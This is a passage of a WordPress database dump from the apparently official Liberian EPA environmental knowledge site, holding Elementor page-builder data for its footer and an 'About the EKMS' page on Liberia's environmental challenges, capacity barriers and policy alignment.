ibutes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"ec337e5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":57.421,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"0cd4e1d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.\",\"align\":\"left\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2788d71\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1305dfd\"}]},\"elements\":[{\"id\":\"34e0d2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"451b973\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b174925\"}]},\"elements\":[{\"id\":\"26b130d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":11.416},\"elements\":[{\"id\":\"e50ba50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Follow us\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"800\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"b3a318e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":14.38},\"elements\":[{\"id\":\"dc604f1\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"56bfa9d\",\"link\":{\"url\":\"https:\\/\\/www.facebook.com\\/ekms.lib.7\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"9c51b4b\",\"link\":{\"url\":\"https:\\/\\/twitter.com\\/EkmsLiberia\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"_id\":\"75309ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"},\"link\":{\"url\":\"https:\\/\\/www.instagram.com\\/ekmsliberia\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_color\":\"custom\",\"icon_primary_color\":\"#0A3C11\",\"icon_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"icon_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"}],\"isInner\":true},{\"id\":\"40a5945\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":49.204,\"content_position\":\"center\"},\"elements\":[{\"id\":\"7ed1dce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This is an Official Web Platform of the Liberian Government.\",\"align\":\"center\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"7948b50\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8cc0c42\",\"elType\":\"widget\",\"settings\":{\"align\":\"right\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"400\",\"__dynamic__\":{\"editor\":\"[elementor-tag id=\\\"3757d32\\\" name=\\\"current-date-time\\\" settings=\\\"%7B%22date_format%22%3A%22custom%22%2C%22custom_format%22%3A%22Y%22%2C%22before%22%3A%22Copyright%20%26copy%3B%20%22%2C%22after%22%3A%22.%20All%20Rights%20Reserved.%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(25884,3812,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(25913,3823,'_elementor_edit_mode','builder'),(25914,3823,'_elementor_template_type','footer'),(25915,3823,'_elementor_version','3.3.1'),(25916,3823,'_elementor_pro_version','3.3.6'),(25917,3823,'_wp_page_template','default'),(25918,3823,'_elementor_data','[{\"id\":\"718abac\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_color\":\"#0A3C11\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4fdbdd5\"}]},\"elements\":[{\"id\":\"cf58eb9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5da1d9c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"32fa8e3\"}]},\"elements\":[{\"id\":\"25535b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":25.91},\"elements\":[{\"id\":\"5e39944\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Subscribe To Our Newsletter\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1a532ac\",\"elType\":\"widget\",\"settings\":{\"text\":\"Sign up now\",\"size\":\"xs\",\"selected_icon\":{\"value\":\"far fa-check-square\",\"library\":\"fa-regular\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"900\",\"background_color\":\"#10CD2A00\",\"hover_color\":\"#0A3C11\",\"button_background_hover_color\":\"#FFFFFF\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/newsletter\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"5a88643\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":24.991,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"14\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4ebe3e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contribute to the EKMS\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6e044b0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <span style=\\\"color: #ffffff;\\\"><a style=\\\"color: #ffffff; text-decoration: underline;\\\" href=\\\"#\\\">Join here!<\\/a><\\/span><\\/p>\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"6387db7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":27.927},\"elements\":[{\"id\":\"1653223\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This Site\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e621672\",\"elType\":\"widget\",\"settings\":{\"menu\":\"footer-menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"\",\"library\":\"\"},\"dropdown\":\"none\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_family\":\"Roboto\",\"menu_typography_font_weight\":\"400\",\"menu_typography_text_transform\":\"uppercase\",\"color_menu_item\":\"#FFFFFF\",\"color_menu_item_hover\":\"#FFFFFF\",\"menu_space_between\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"jet_family_widget_is_order_orientaion\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true},{\"id\":\"190105d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":21.147},\"elements\":[{\"id\":\"5c7c794\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"01d6428\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Address:<br>4th Street, Sinkor\",\"selected_icon\":{\"value\":\"far fa-address-book\",\"library\":\"fa-regular\"},\"_id\":\"933aa45\"},{\"text\":\"Email:<br>contact@ekmsliberia.info\",\"selected_icon\":{\"value\":\"far fa-envelope\",\"library\":\"fa-regular\"},\"_id\":\"52f7dde\",\"link\":{\"url\":\"mailto:contact@ekmsliberia.info\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"text\":\"Telephone:<br>+231775006254\",\"selected_icon\":{\"value\":\"fas fa-phone\",\"library\":\"fa-solid\"},\"_id\":\"5751132\"}],\"icon_color\":\"#FFFFFF\",\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_family\":\"Roboto\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"e2ebe37\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d116479\"}]},\"elements\":[{\"id\":\"a4a3928\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":6.389},\"elements\":[],\"isInner\":true},{\"id\":\"d2ea495\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":31.768,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"isInner\":true},{\"id\":\"cd2220c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":4.422},\"elements\":[{\"id\":\"0ad9417\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/gef_logo.jpg\",\"id\":92,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/www.thegef.org\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"ec337e5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":57.421,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"0cd4e1d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.\",\"align\":\"left\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2788d71\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1305dfd\"}]},\"elements\":[{\"id\":\"34e0d2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"451b973\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b174925\"}]},\"elements\":[{\"id\":\"26b130d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":11.416},\"elements\":[{\"id\":\"e50ba50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Follow us\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"800\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"b3a318e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":14.38},\"elements\":[{\"id\":\"dc604f1\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"56bfa9d\",\"link\":{\"url\":\"https:\\/\\/www.facebook.com\\/ekms.lib.7\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"9c51b4b\",\"link\":{\"url\":\"https:\\/\\/twitter.com\\/EkmsLiberia\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"_id\":\"75309ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"},\"link\":{\"url\":\"https:\\/\\/www.instagram.com\\/ekmsliberia\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_color\":\"custom\",\"icon_primary_color\":\"#0A3C11\",\"icon_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"icon_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"}],\"isInner\":true},{\"id\":\"40a5945\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":49.204,\"content_position\":\"center\"},\"elements\":[{\"id\":\"7ed1dce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This is an Official Web Platform of the Liberian Government.\",\"align\":\"center\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"7948b50\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8cc0c42\",\"elType\":\"widget\",\"settings\":{\"align\":\"right\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"400\",\"__dynamic__\":{\"editor\":\"[elementor-tag id=\\\"3757d32\\\" name=\\\"current-date-time\\\" settings=\\\"%7B%22date_format%22%3A%22custom%22%2C%22custom_format%22%3A%22Y%22%2C%22before%22%3A%22Copyright%20%26copy%3B%20%22%2C%22after%22%3A%22.%20All%20Rights%20Reserved.%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(25920,3823,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(25923,3824,'_wp_attached_file','2021/08/jet-search-1.zip'),(25924,3824,'_wp_attachment_context','upgrader'),(25940,3829,'_elementor_edit_mode','builder'),(25941,3829,'_elementor_template_type','wp-page'),(25942,3829,'_elementor_version','2.7.5'),(25943,3829,'_wp_page_template','default'),(25944,3829,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and Partner governmental institutions as well as non-governmental organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<h3>Development Challenge<\\/h3>\\n<h4>A1. Global Environmental Challenges<\\/h4>\\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).<\\/p>\\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia\\u2019s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).<\\/p>\\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia\\u2019s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).<\\/p>\\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia\\u2019s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.<\\/p>\\n<h4>Root Causes<\\/h4>\\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia\\u2019s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.<\\/p>\\n<h4>A2. Capacity Barriers<\\/h4>\\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia\\u2019s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:<\\/p>\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li>Inadequate public awareness and education\\/training<\\/li>\\n<li>Inadequate institutions and institutional frameworks<\\/li>\\n<li>Inadequate political commitment<\\/li>\\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation<\\/li>\\n<li>Inadequate financial resources and economic framework<\\/li>\\n<li>Inadequate strategic plans and implementation<\\/li>\\n<li>Inadequate access to information<\\/li>\\n<li>Inadequate policies and legal frameworks<\\/li>\\n<li>Low level of involvement of civil society<\\/li>\\n<li>Inadequate natural resources management systems<\\/li>\\n<li>Lack of institutional capacities<\\/li>\\n<li>Lack of effective mechanism for information processing and sharing<\\/li>\\n<li>\\n<p>Poor governance<\\/p>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"265f48f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia\\u2019s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:<\\/p>\\n<ul>\\n<li>Weak technical, administrative and managerial capacities;<\\/li>\\n<li>Weak institutional coordination;<\\/li>\\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;<\\/li>\\n<li>Limited stakeholder participation in planning and decision-making processes;<\\/li>\\n<li>Limited dissemination of key information (Republic of Liberia, 2013).<\\/li>\\n<\\/ul>\\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).<\\/p>\\n<h4>A.3 Consistency with National Priorities<\\/h4>\\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).<\\/p>\\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size\\/number of protected areas. In Liberia\\u2019s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.<\\/p>\\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.<\\/p>\\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.<\\/p>\\n<p>The project is also in line with Liberia\\u2019s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia\\u2019s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).<\\/p>\\n<p>Liberia\\u2019s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia\\u2019s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.<\\/p>\\n<p>This project is also in line with Liberia\\u2019s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:<\\/p>\\n<ul>\\n<li>Peace, Security, Rule of Law<\\/li>\\n<li>Sustainable Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Inclusive Governance and Public Institutions<\\/li>\\n<\\/ul>\\n<p>The UNDAF (One Programme) also aligns with Liberia\\u2019s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:<\\/p>\\n<ul>\\n<li>Peace, Security and Rule of Law<\\/li>\\n<li>Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Governance and Public Institutions<\\/li>\\n<li>Cross-cutting issues<\\/li>\\n<\\/ul>\\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information\\/data.<\\/p>\\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.<\\/p>\\n<h4>A.4 Baseline Scenario and Associated Baseline Projects<\\/h4>\\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country\\u2019s degraded 